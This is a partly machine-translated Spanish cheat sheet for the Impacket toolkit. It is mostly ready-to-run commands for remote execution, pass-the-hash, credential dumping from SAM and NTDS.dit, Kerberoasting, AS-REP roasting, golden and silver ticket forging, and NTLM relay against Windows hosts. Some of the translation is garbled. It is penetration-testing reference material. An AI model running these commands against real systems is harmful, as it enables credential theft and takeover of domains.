Impacket Toolkit Cheat Sheet

"Clase de la hoja" id="copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada

Sinopsis

Impacket es una colección de clases de Python para trabajar con protocolos de red. Proporciona acceso programático de bajo nivel a paquetes e implementa varios protocolos incluyendo SMB, MSRPC y Kerberos. Impacket incluye numerosas herramientas listas para usar para pruebas de penetración, especialmente centradas en entornos de Windows.

NOVEDAD Advertencia: Impacket es una herramienta de pruebas de seguridad que sólo debe usarse en entornos donde tiene permiso explícito para hacerlo.

Instalación

De PyPI

pip install impacket

De GitHub

git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install

En Kali Linux

sudo apt update
sudo apt install -y python3-impacket

Uso del medio ambiente virtual

# Create and activate virtual environment
python -m venv impacket-env
source impacket-env/bin/activate  # Linux/macOS
impacket-env\Scripts\activate.bat  # Windows

# Install Impacket
pip install impacket

Herramientas de ejecución del comando

psexec.py

Ejecute comandos en sistemas remotos de Windows usando el protocolo SMB, similar al PsExec de SysInternals.

Uso básico

psexec.py [domain/]username[:password]@target [options] [command]

Opciones comunes

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-k	Use Kerberos authentication
-no-pass	Don't ask for password (useful for Kerberos)
-port [port]	Connect to SMB Server port (default: 445)
-debug	Turn DEBUG output ON

Ejemplos

# Execute command with explicit credentials
psexec.py administrator:Password123@192.168.1.100 cmd.exe

# Execute command with domain credentials
psexec.py domain/administrator:Password123@192.168.1.100 cmd.exe

# Execute specific command
psexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use hash instead of password (Pass-the-Hash)
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 cmd.exe

smbexec.py

Similar a psexec.py pero utiliza diferentes técnicas para ejecutar comandos, lo que lo hace potencialmente sigilo.

Uso básico

smbexec.py [domain/]username[:password]@target [options]

Opciones comunes

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-share SHARE	Share where the output will be grabbed from (default: ADMIN$)
-shell-type \\{cmd,powershell\\}	Shell type to use (default: cmd)
-codec CODEC	Sets encoding used (codec) from the target's output (default: UTF-8)
-service-name NAME	Service name to use (default: random)

Ejemplos

# Execute with explicit credentials
smbexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
smbexec.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Use PowerShell instead of cmd
smbexec.py -shell-type powershell administrator:Password123@192.168.1.100

wmiexec.py

Ejecute comandos en sistemas remotos de Windows usando WMI.

Uso básico

wmiexec.py [domain/]username[:password]@target [options] [command]

Opciones comunes

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-share SHARE	Share where the output will be grabbed from (default: ADMIN$)
-silentcommand	Execute command and return immediately without output
-codec CODEC	Sets encoding used (codec) from the target's output (default: UTF-8)
-shell-type \\{cmd,powershell\\}	Shell type to use (default: cmd)

Ejemplos

# Execute with explicit credentials
wmiexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
wmiexec.py domain/administrator:Password123@192.168.1.100

# Execute specific command
wmiexec.py administrator:Password123@192.168.1.100 "ipconfig /all"

# Use hash instead of password (Pass-the-Hash)
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

dcomexec.py

Ejecute comandos en sistemas remotos de Windows usando objetos DCOM.

Uso básico

dcomexec.py [domain/]username[:password]@target [options] [command]

Opciones comunes

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-object \\{ShellWindows,ShellBrowserWindow,MMC20\\}	DCOM object to use (default: MMC20.Application)
-silentcommand	Execute command and return immediately without output
-codec CODEC	Sets encoding used (codec) from the target's output (default: UTF-8)
-shell-type \\{cmd,powershell\\}	Shell type to use (default: cmd)

Ejemplos

# Execute with explicit credentials
dcomexec.py administrator:Password123@192.168.1.100

# Execute with domain credentials
dcomexec.py domain/administrator:Password123@192.168.1.100

# Execute with specific DCOM object
dcomexec.py -object ShellWindows administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
dcomexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

atexec.py

Ejecute comandos en sistemas remotos de Windows usando el servicio Task Scheduler.

Uso básico

atexec.py [domain/]username[:password]@target [options] command

Opciones comunes

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-silentcommand	Execute command and return immediately without output
-codec CODEC	Sets encoding used (codec) from the target's output (default: UTF-8)

Ejemplos

# Execute command with explicit credentials
atexec.py administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

# Execute command with domain credentials
atexec.py domain/administrator:Password123@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

# Use hash instead of password (Pass-the-Hash)
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 "whoami > C:\\temp\\whoami.txt"

Herramientas de extracción de potencia

secretsdump.py

Extrae las credenciales de un sistema remoto de Windows, incluyendo SAM, LSA Secrets, y NTDS.dit.

Uso básico

secretsdump.py [domain/]username[:password]@target [options]

Opciones comunes

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-just-dc	Extract only NTDS.DIT data (domain controller only)
-just-dc-ntlm	Extract only NTDS.DIT NTLM hashes (domain controller only)
-just-dc-user USER	Extract only NTDS.DIT data for specific user
-pwd-last-set	Shows pwdLastSet attribute for each NTDS.DIT account
-user-status	Shows whether the user is enabled or disabled
-history	Dump password history
-outputfile FILE	Write output to file

Ejemplos

# Dump credentials with explicit credentials
secretsdump.py administrator:Password123@192.168.1.100

# Dump credentials with domain credentials
secretsdump.py domain/administrator:Password123@192.168.1.100

# Dump credentials using hash (Pass-the-Hash)
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

# Dump credentials from local files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

# Dump credentials from NTDS.dit
secretsdump.py -ntds ntds.dit -system system.save LOCAL

# Extract only domain controller NTLM hashes
secretsdump.py -just-dc-ntlm domain/administrator:Password123@192.168.1.100

Herramientas de ataque de Kerberos

GetNPUsers.py

Retrieves contraseña hashes para los usuarios con "No requieren preauthentication de Kerberos" conjunto (ASREPRoast attack).

Uso básico

GetNPUsers.py [domain/]username[:password] -dc-ip <DC_IP> [options]

Opciones comunes

Option	Description
-request	Requests TGT for users and output them in JtR/hashcat format
-no-pass	Don't ask for password (useful for Kerberos)
-k	Use Kerberos authentication
-dc-ip IP	IP Address of the domain controller
-usersfile FILE	File with user per line to test
-format \\{hashcat,john\\}	Format to save the AS_REP responses (default: hashcat)
-outputfile FILE	Output filename to write ciphers in JtR/hashcat format

Ejemplos

# Get users without Kerberos preauthentication with explicit credentials
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request

# Get users without Kerberos preauthentication for specific user
GetNPUsers.py domain/username:password -dc-ip 192.168.1.100 -request -target-user user1

# Get users without Kerberos preauthentication for all users in domain
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -usersfile users.txt -format hashcat

# Use no credentials (anonymous)
GetNPUsers.py domain/ -dc-ip 192.168.1.100 -no-pass

GetUserSPNs.py

Retrieves Service Principal Names (SPNs) para las cuentas en el dominio (Kerberoasting attack).

Uso básico

GetUserSPNs.py [domain/]username[:password] -dc-ip <DC_IP> [options]

Opciones comunes

Option	Description
-request	Requests TGS for users and output them in JtR/hashcat format
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-dc-ip IP	IP Address of the domain controller
-target-user USER	Target specific user to request TGS for
-outputfile FILE	Output filename to write ciphers in JtR/hashcat format
-format \\{hashcat,john\\}	Format to save the TGS tickets (default: hashcat)

Ejemplos

# Get SPNs with explicit credentials
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request

# Get SPNs for specific user
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -target-user sqlservice

# Output hashes in specific format
GetUserSPNs.py domain/username:password -dc-ip 192.168.1.100 -request -format hashcat

# Use hash instead of password (Pass-the-Hash)
GetUserSPNs.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 domain/username -dc-ip 192.168.1.100 -request

ticketer.py

Crea entradas de oro y plata para la autenticación de Kerberos.

Uso básico

ticketer.py [options] username

Opciones comunes

Option	Description
-nthash HASH	NT hash for the user or service account
-aesKey KEY	AES key for the user or service account
-domain DOMAIN	Domain name
-domain-sid SID	Domain SID
-spn SPN	Service Principal Name (for Silver Tickets)
-groups IDS	Comma-separated list of group IDs to include in the ticket
-duration HOURS	Ticket duration in hours (default: 10)
-out FILE	Output filename to save the ticket

Ejemplos

# Create Golden Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local administrator

# Create Silver Ticket
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -spn MSSQLSvc/sqlserver.contoso.local:1433 administrator

# Specify output file
ticketer.py -nthash 7facdc498ed1680c4fd1448319a8c04f -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -domain contoso.local -out ticket.kirbi administrator

Herramientas de protocolos de red

smbclient.py

Proporciona un cliente SMB para acceder a acciones y archivos en sistemas remotos.

Uso básico

smbclient.py [domain/]username[:password]@target [options]

Opciones comunes

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-port [port]	Connect to SMB Server port (default: 445)
-file FILE	Input file with commands to execute in the mini shell
-debug	Turn DEBUG output ON

Comandos comunes (Shell Interactivo)

Command	Description
help	Show available commands
shares	List available shares
use <share>	Connect to a specific share
ls	List files in current directory
cd <dir>	Change directory
get <file>	Download file
put <file>	Upload file
rm <file>	Delete file
mkdir <dir>	Create directory
rmdir <dir>	Remove directory
exit	Exit the shell

Ejemplos

# Connect with explicit credentials
smbclient.py administrator:Password123@192.168.1.100

# Connect with domain credentials
smbclient.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

mssqlclient.py

Proporciona un cliente para interactuar con las instancias de Microsoft SQL Server.

Uso básico

mssqlclient.py [domain/]username[:password]@target [options]

Opciones comunes

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-windows-auth	Use Windows Authentication (default: False)
-port [port]	Destination port to connect to (default: 1433)
-db DATABASE	MSSQL database instance (default: None)
-file FILE	Input file with commands to execute in the SQL shell
-debug	Turn DEBUG output ON

Comandos comunes (Shell Interactivo)

Command	Description
help	Show available commands
enable_xp_cmdshell	Enable the xp_cmdshell stored procedure
disable_xp_cmdshell	Disable the xp_cmdshell stored procedure
xp_cmdshell <command>	Execute command through xp_cmdshell
sp_start_job <job>	Start a SQL Server job
exit	Exit the shell

Ejemplos

# Connect with explicit credentials
mssqlclient.py sa:Password123@192.168.1.100

# Connect with domain credentials
mssqlclient.py domain/sqluser:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
mssqlclient.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 sa@192.168.1.100

# Enable Windows authentication
mssqlclient.py domain/sqluser:Password123@192.168.1.100 -windows-auth

Otras herramientas útiles

ntlmrelayx.py

Performs NTLM Atentados de relé.

Uso básico

ntlmrelayx.py [options]

Opciones comunes

Option	Description
-t TARGET	Target to relay the credentials to
-tf FILE	File with targets to relay the credentials to
-w	Start the HTTP server and do not relay credentials
-e FILE	Execute this file when a connection is relayed
-c COMMAND	Execute this command when a connection is relayed
-smb2support	Enable SMB2 support
-socks	Launch a SOCKS proxy for the connection
-one-shot	Relay only one connection
-debug	Turn DEBUG output ON

Ejemplos

# Relay to specific target
ntlmrelayx.py -t smb://192.168.1.100 -smb2support

# Relay to multiple targets
ntlmrelayx.py -tf targets.txt -smb2support

# Execute command on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -c "whoami > C:\\temp\\whoami.txt"

# Dump SAM database on successful relay
ntlmrelayx.py -t smb://192.168.1.100 -smb2support -d

# Start SOCKS proxy
ntlmrelayx.py -tf targets.txt -socks

Lookupsid.py

Realiza búsquedas SID para enumerar usuarios y grupos.

Uso básico

lookupsid.py [domain/]username[:password]@target [options]

Opciones comunes

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-domain DOMAIN	Domain to enumerate (default: target domain)
-debug	Turn DEBUG output ON

Ejemplos

# Enumerate SIDs with explicit credentials
lookupsid.py administrator:Password123@192.168.1.100

# Enumerate SIDs with domain credentials
lookupsid.py domain/administrator:Password123@192.168.1.100

# Use hash instead of password (Pass-the-Hash)
lookupsid.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100

reg.py

Proporciona una herramienta de manipulación remota del registro.

Uso básico

reg.py [domain/]username[:password]@target [options] action [params]

Opciones comunes

Option	Description
-hashes LMHASH:NTHASH	Use NTLM hashes instead of password (Pass-the-Hash)
-debug	Turn DEBUG output ON

Acciones

Action	Description
query	Query a registry key or value
add	Add a registry key or value
delete	Delete a registry key or value
save	Save a registry hive to a file

Ejemplos

# Query registry key with explicit credentials
reg.py administrator:Password123@192.168.1.100 query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# Add registry key with domain credentials
reg.py domain/administrator:Password123@192.168.1.100 add -keyName HKLM\\SOFTWARE\\Test -v TestValue -vt REG_SZ -vd "Test Data"

# Delete registry key with hash (Pass-the-Hash)
reg.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.100 delete -keyName HKLM\\SOFTWARE\\Test

Parámetros comunes Across Tools

Parameter	Description
-h, --help	Show help message and exit
-debug	Turn DEBUG output ON
-hashes LMHASH:NTHASH	NTLM hashes, format is LMHASH:NTHASH
-no-pass	Don't ask for password (useful for Kerberos)
-k	Use Kerberos authentication
-aesKey KEY	AES key to use for Kerberos authentication
-dc-ip IP	IP Address of the domain controller
-target-ip IP	IP Address of the target machine
-port [port]	Destination port to connect to

Recursos

• Repositorio oficial de GitHub
• Impacket Documentation
• Ejemplos de paquete
• Impacket Wiki
• Impacket API Documentation